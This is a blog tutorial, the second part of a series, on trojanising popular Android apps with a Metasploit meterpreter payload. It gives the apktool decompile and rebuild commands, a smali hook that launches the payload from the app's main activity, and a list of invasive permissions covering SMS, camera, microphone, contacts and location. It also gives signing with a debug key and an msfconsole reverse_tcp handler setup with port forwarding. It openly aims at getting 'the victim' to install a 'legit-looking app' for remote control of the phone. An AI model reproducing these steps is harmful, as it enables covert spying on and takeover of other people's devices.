Hacking Android With Metasploit!
We’ve discussed how to create Metasploit payload and how to configure your Linux to NOIP account for DDNS in First Part of this series
In this second and the last part we’ll do Hooking up the metasploit node and embedding the payload inside the Android App. (Your favored apps like Facebook or Gmail or any games)
For that we require:
- APKTOOL the android reverse engineering tool
You can install the apktool easily by typing this command on terminals (Apktool is came with the Kali-Linux OS)
sudo apt-get install apktool
- Jarsigner for digitally sign the android Apps with fake certificates
Download necessary files for jarsigner from our GitHub repository
OneClicksigner
So now all we’ve to do is:
1. Generate the Meterpreter payload
2.Decompile the payload and the original apk
3.Copy the payload files to the original apk
4.Inject the hook into the appropriate activity of the original apk
5.Inject the permissions in the AndroidManifest.xml file
6.Re-compile the original apk
7.Sign the apk using Jarsigner
We’ve already done with generating Metasploit payload in last part.
So we’ll continue to
Second step
Decompiling the payload and you’re desired APK file which you want place your payload:
The apktool decompile command is as follows
apktool d -f -o payload /root/meterpreter.apk
apktool d -f -o original /root/original_app_name.apk
After compliment this process there will be 2 folders at the root one contains the files of msf payload and another one is of original apk which is to be binded by payload.
Third step
Coping the Files from Payload apk to original apk:
So open up the AndroidManifest.xml file located inside the “/root/original” folder using any text editor.
If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure e.g. <tag attribute=”value”> Content </tag>. Anyway, look for an <activity> tag which contains both the lines –
<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>
Step four
Inject the hook into the appropriate activity of the original apk
On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its “android:name” attribute’s value
Those two lines we searched for signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity similar to the ‘main’ function in traditional programming.
Now that we have the name of the activity we want to inject the hook into, let’s get to it! First of all, open the .smali code of that activity using text editors. Just open a terminal and type –
gedit /root/original/smali/Activity_Path
Replace the Activity_Path with the activity’s “android:name“, but instead of the dots, type slash. Actually the smali codes are stored in folders named in the format the “android:name” is in, so we can easily get the location of the .smali code in the way we did.
Then search for the following line in the smali code using CTRL+F –
;->onCreate(Landroid/os/Bundle;)V
When you get that change the entire line to this
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
When the mainactivity executes this line what happens is the app executes the main activity of the app with the metasploit payload.
So we can get the meterpreter shell in our Console.
Step five
Inject the permissions in the AndroidManifest.xml file
Now we all are set but we must have to give necessary permissions or additional permission to get the full control over android device for that we’ve to edit the android manifest xml file
XML file looks as the HTML so it’s easy to manipulate the file.
Please copy this text and place it in specified area after <permission> tag with other but don’t make redundant lines:
<uses-permission android:name="android.permission.VIBRATE"/> <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/> <uses-permission android:name="android.permission.WAKE_LOCK"/> <uses-permission android:name="android.permission.READ_PHONE_STATE"/> <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/> <uses-permission android:name="android.permission.CAMERA"/> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/> <uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/> <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/> <uses-permission android:name="android.permission.READ_LOGS"/> <uses-permission android:name="android.permission.DEVICE_POWER"/> <uses-permission android:name="android.permission.SET_WALLPAPER"/> <uses-permission android:name="android.permission.WRITE_SETTINGS"/> <uses-permission android:name="android.permission.EXPAND_STATUS_BAR"/> <uses-permission android:name="android.permission.GET_TASKS"/> <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/> <uses-permission android:name="android.permission.STATUS_BAR"/> <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> <uses-permission android:name="com.android.launcher.permission.READ_SETTINGS"/> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/> <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/> <uses-permission android:name="android.permission.INTERNET"/> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/> <uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/> <uses-permission android:name="android.permission.SEND_SMS"/> <uses-permission android:name="android.permission.RECEIVE_SMS"/> <uses-permission android:name="android.permission.RECORD_AUDIO"/> <uses-permission android:name="android.permission.CALL_PHONE"/> <uses-permission android:name="android.permission.READ_CONTACTS"/> <uses-permission android:name="android.permission.WRITE_CONTACTS"/> <uses-permission android:name="android.permission.READ_SMS"/> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/> <uses-permission android:name="com.android.vending.BILLING"/>
Step six
Re-compile the original apk
After saving the XML file we’ve to go for re-compilation of file to get embedded with .apk file.
apktool b /root/original
Now the original apk file is ready!
Step seven
Sign the apk using Jarsigner
Android requires that all apps be digitally signed with a certificate before they can be installed. It (Android) uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate’s private key.
In this case we are going to sign the apk using the default android debug key. Just run the following command –
jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey
The file keystore and all the necessary files there in the oncliksign.zip file please download this from the following links
Download Link1
Download Link2
Now if you can get the victim to install and run this very legit-looking app in his phone, you can get a working meterpreter session on his phone!
Just open your console command:
->msfconsole
->use multi/handler
->set PAYLOAD android/meterpreter/reverse_tcp
->set LHOST
->set LPORT 4444
->exploit
While specifying PAYLOAD Please check that what you’ve given while creating PAYLOAD
it should be same and to get the meterpreter session the port 4444 should be PORT FORWARDED from your router/modem.
To do this go to your gateway or home-page of router (Example: 192.168.1.1/home.html)
There you’ll find the Virtual Server or Port Forwarding option just set all TCP port forwarding active.
If you use internet from android mobile hotspots please Download Port Forward Apps avilable on Playstore.
Profit from this Tool is
When the victim installs the app in his phone you’ll get meterpreter session opened and you can perform many operations on it like taking photo,recording voice check_root etc…
Just type help when you get meterpreter session there are several operations will be listed!
I hope this Metasploit series of hacking android phones is very helpful. 🙂
If you have any queries please write in comments section we’ll take care of it.
Thank you..!
Lanwil DS (Team HR)